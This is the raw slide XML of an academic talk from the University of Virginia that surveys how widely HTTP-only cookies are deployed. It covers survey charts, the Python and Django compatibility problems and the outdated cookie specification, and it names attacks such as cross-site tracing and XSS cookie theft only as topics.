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60" r:id="rId4"/>
    <p:sldId id="265" r:id="rId5"/>
    <p:sldId id="268" r:id="rId6"/>
    <p:sldId id="303" r:id="rId7"/>
    <p:sldId id="304" r:id="rId8"/>
    <p:sldId id="305" r:id="rId9"/>
    <p:sldId id="301" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="300" r:id="rId12"/>
    <p:sldId id="277" r:id="rId13"/>
    <p:sldId id="278" r:id="rId14"/>
    <p:sldId id="295" r:id="rId15"/>
    <p:sldId id="279" r:id="rId16"/>
    <p:sldId id="280" r:id="rId17"/>
    <p:sldId id="282" r:id="rId18"/>
    <p:sldId id="312" r:id="rId19"/>
    <p:sldId id="309" r:id="rId20"/>
    <p:sldId id="310" r:id="rId21"/>
    <p:sldId id="311" r:id="rId22"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3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88" autoAdjust="0"/>
    <p:restoredTop sz="89495" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="67" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="-6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style val="18"/>
  <c:chart>
    <c:autoTitleDeleted val="1"/>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:layoutTarget val="inner"/>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.27144012944983831"/>
          <c:y val="9.4109195402298867E-2"/>
          <c:w val="0.44255663430420733"/>
          <c:h val="0.7859195402298853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HTTP-only deployment</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-0.21582575236347884"/>
                  <c:y val="-2.671056204181376E-3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>
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>No HTTP-only authentication cookies, 26</a:t>
                    </a:r>
                  </a:p>
                </c:rich>
              </c:tx>
              <c:showVal val="1"/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en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>Use HTTP-only authentication cookies, 24</a:t>
                    </a:r>
                  </a:p>
                </c:rich>
              </c:tx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Sheet1!$A$2:$A$3</c:f>
              <c:strCache>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>No HTTP-only authentication cookies</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Use HTTP-only authentication cookies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26</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>24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zh-CN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style val="18"/>
  <c:chart>
    <c:autoTitleDeleted val="1"/>
    <c:plotArea>
      <c:layout>
        <c:manualLayout>
          <c:layoutTarget val="inner"/>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.27629449838187708"/>
          <c:y val="9.4109195402298867E-2"/>
          <c:w val="0.45226537216828477"/>
          <c:h val="0.8031609195402296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HTTP-only deployment</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-0.21570738730474232"/>
                  <c:y val="-3.0406824146981627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>
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>No HTTP-only authentication cookies, 26</a:t>
                    </a:r>
                  </a:p>
                </c:rich>
              </c:tx>
              <c:showVal val="1"/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en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>Before login, 11</a:t>
                    </a:r>
                  </a:p>
                </c:rich>
              </c:tx>
              <c:showVal val="1"/>
              <c:showCatNam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altLang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                      </a:rPr>
                      <a:t>After login, 13</a:t>
                    </a:r>
                  </a:p>
                </c:rich>
              </c:tx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Sheet1!$A$2:$A$4</c:f>
              <c:strCache>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>No HTTP-only authentication cookies</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Before login</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>After login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26</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>13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zh-CN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style val="18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Disable Trace</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dLbls>
            <c:showVal val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$4</c:f>
              <c:strCache>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>Use HTTP-only</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>None-HTTP-only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22</c:v>
                </c:pt>
                <c:pt idx="1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Enable Trace</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dLbls>
            <c:showVal val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$4</c:f>
              <c:strCache>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>Use HTTP-only</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>None-HTTP-only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</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>6</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:overlap val="100"/>
        <c:axId val="155482368"/>
        <c:axId val="155496448"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="15548236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/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="155496448"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="155496448"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="15548236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zh-CN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style val="18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Secure</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dLbls>
            <c:showVal val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$4</c:f>
              <c:strCache>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>Use HTTP-only</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>None-HTTP-only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</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>21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Insecure</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:dLbls>
            <c:showVal val="1"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>Sheet1!$A$2:$A$4</c:f>
              <c:strCache>
                <c:ptCount val="2"/>
                <c:pt idx="0">
                  <c:v>Use HTTP-only</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>None-HTTP-only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</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>5</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:overlap val="100"/>
        <c:axId val="155583232"/>
        <c:axId val="155584768"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="15558323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/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="155584768"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="155584768"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:axPos val="l"/>
        <c:majorGridlines/>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="15558323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zh-CN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BC155CB-A9F0-4CEE-A1CF-67852D8F4404}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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7C50D29-FD3C-403E-A644-CC9C6A4393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7A26A5C-94BB-403F-8A4E-4C68E032A0C6}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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330B37-38B2-4A40-AA83-54B4155B6A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1.Explain XSS cookie stealing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2.HTTP-only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t> mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>3.Cookie Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>4.Defense-in-depth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>5.Still provide defense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30B37-38B2-4A40-AA83-54B4155B6AB6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30B37-38B2-4A40-AA83-54B4155B6AB6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30B37-38B2-4A40-AA83-54B4155B6AB6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30B37-38B2-4A40-AA83-54B4155B6AB6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altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>This is the most important reason.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>As</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t> you can see, there are a lot of events going on here.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30B37-38B2-4A40-AA83-54B4155B6AB6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30B37-38B2-4A40-AA83-54B4155B6AB6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30B37-38B2-4A40-AA83-54B4155B6AB6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10 sec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30B37-38B2-4A40-AA83-54B4155B6AB6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30B37-38B2-4A40-AA83-54B4155B6AB6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altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>2002 introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Apache.org announces exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>2 Reasons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Survey</a:t>
            </a:r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30B37-38B2-4A40-AA83-54B4155B6AB6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altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Sample sites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baseline="0" dirty="0" smtClean="0"/>
              <a:t>Semi-automatic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Firefox Extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Register and log in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30B37-38B2-4A40-AA83-54B4155B6AB6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30B37-38B2-4A40-AA83-54B4155B6AB6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altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Open source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Closed source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The deployment is not very wide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30B37-38B2-4A40-AA83-54B4155B6AB6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Reasons?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30B37-38B2-4A40-AA83-54B4155B6AB6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altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Firefox extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Firebug screenshot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This reason is not important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30B37-38B2-4A40-AA83-54B4155B6AB6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altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Circumvention?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XST and AJAX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30B37-38B2-4A40-AA83-54B4155B6AB6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Results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30B37-38B2-4A40-AA83-54B4155B6AB6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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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7B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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8A6B-0005-467B-BEDF-6478468F99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97B69-9A8B-4AFF-9FEA-1D05CE6E3D54}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2010/5/20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E8A6B-0005-467B-BEDF-6478468F99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chart" Target="../charts/chart1.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId1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09600" y="663575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Why aren’t HTTP-only cookies more widely deployed?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362200" y="3886200"/>
            <a:ext cx="3581400" cy="914400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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Yuchen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Zhou</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>David Evans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2895600"/>
            <a:ext cx="4367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 smtClean="0"/>
              <a:t>Department of Computer Science</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>University of Virginia</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="fortune-cookie-youre-fired-mess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810000"/>
            <a:ext cx="3905250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advTm="118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Can We Circumvent HTTP-only?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 numCol="2">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Cross-site tracing</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>AJAX based attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="23" name="内容占位符 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="2057400"/>
          <a:ext cx="36576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内容占位符 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4572000" y="2057400"/>
          <a:ext cx="38100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advTm="2996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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2438400"/>
            <a:ext cx="3767137" cy="957532"/>
            <a:chOff x="1600200" y="2362200"/>
            <a:chExt cx="3767137" cy="957532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0200" y="2362200"/>
              <a:ext cx="1409700" cy="957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8200" y="2590800"/>
              <a:ext cx="719137" cy="690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左右箭头 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124200" y="2819400"/>
              <a:ext cx="1447800" cy="240089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5410200"/>
            <a:ext cx="1243012" cy="979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Protection Effectiveness</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="左右箭头 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20738518">
            <a:off x="4794291" y="2326571"/>
            <a:ext cx="2823864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右箭头 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2949411">
            <a:off x="2460952" y="4276318"/>
            <a:ext cx="2939396" cy="20758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3276600"/>
            <a:ext cx="571099" cy="605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0" name="组合 39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7093389" y="1676400"/>
            <a:ext cx="1364811" cy="3969482"/>
            <a:chOff x="6559989" y="1676400"/>
            <a:chExt cx="1364811" cy="3969482"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="组合 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7315200" y="1676400"/>
              <a:ext cx="609600" cy="1066800"/>
              <a:chOff x="3886200" y="3276600"/>
              <a:chExt cx="904875" cy="1613769"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Picture 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886200" y="3276600"/>
                <a:ext cx="847725" cy="916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2" name="Picture 4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886200" y="4267200"/>
                <a:ext cx="904875" cy="6231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39" name="组合 38"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6559989" y="2519387"/>
              <a:ext cx="685221" cy="3126495"/>
              <a:chOff x="6559989" y="2519387"/>
              <a:chExt cx="685221" cy="3126495"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="下箭头 28"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="2273704">
                <a:off x="6559989" y="2519387"/>
                <a:ext cx="228600" cy="3126495"/>
              </a:xfrm>
              <a:prstGeom prst="down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 rot="18527152">
                <a:off x="6480417" y="3888415"/>
                <a:ext cx="11602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Key logger</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2893685">
            <a:off x="2470892" y="4435787"/>
            <a:ext cx="2456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Network package sniffer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="组合 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4442133" y="3124200"/>
            <a:ext cx="1944379" cy="2209800"/>
            <a:chOff x="3908733" y="3124200"/>
            <a:chExt cx="1944379" cy="2209800"/>
          </a:xfrm>
        </p:grpSpPr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800600" y="3124200"/>
              <a:ext cx="1052512" cy="927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左右箭头 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1158498">
              <a:off x="3908733" y="3203199"/>
              <a:ext cx="990600" cy="3048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下箭头 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5029200" y="4038600"/>
              <a:ext cx="228600" cy="1295400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257800" y="4114800"/>
              <a:ext cx="461665" cy="107119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dirty="0" smtClean="0"/>
                <a:t>Hard drive</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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133600" y="2209800"/>
            <a:ext cx="2864318" cy="3246680"/>
            <a:chOff x="2133600" y="2209800"/>
            <a:chExt cx="2864318" cy="3246680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="上箭头 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="19981891">
              <a:off x="4576107" y="3367239"/>
              <a:ext cx="228600" cy="2089241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左箭头 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2133600" y="2590800"/>
              <a:ext cx="1371600" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="lef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14600" y="2209800"/>
              <a:ext cx="6447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CSRF</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" alt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 rot="3666196">
              <a:off x="4490888" y="4072998"/>
              <a:ext cx="6447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CSRF</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advTm="286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1" animBg="1"/>
      <p:bldP spid="3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Python doesn’t support HTTP-only until 2.6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Django is based on python, so the deployment progress is stalled.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Software Stack Compatibility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762000" y="1371600"/>
            <a:ext cx="7315201" cy="2199671"/>
            <a:chOff x="685800" y="1676400"/>
            <a:chExt cx="6739848" cy="2199671"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="椭圆形标注 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1676400" y="1676400"/>
              <a:ext cx="5749248" cy="990600"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeEllipseCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -49904"/>
                <a:gd name="adj2" fmla="val 823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“Hmm, we probably can't use a patch that requires a patched python. Any different solution?”</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp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5800" y="2590800"/>
              <a:ext cx="976312" cy="1285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" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="3124200"/>
            <a:ext cx="198131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Django Developers</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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44273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Standards Compliance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Cookie specification has never been updated since HTTP-only was introduced.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Without the specs, the developers are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>hesitating to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>make the change.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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286000"/>
            <a:ext cx="1066800" cy="128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椭圆形标注 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1371600"/>
            <a:ext cx="6096000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49904"/>
              <a:gd name="adj2" fmla="val 823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“Also, could you point me to where the RFC is talking about 'httponly'? I couldn't find it at all.” </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
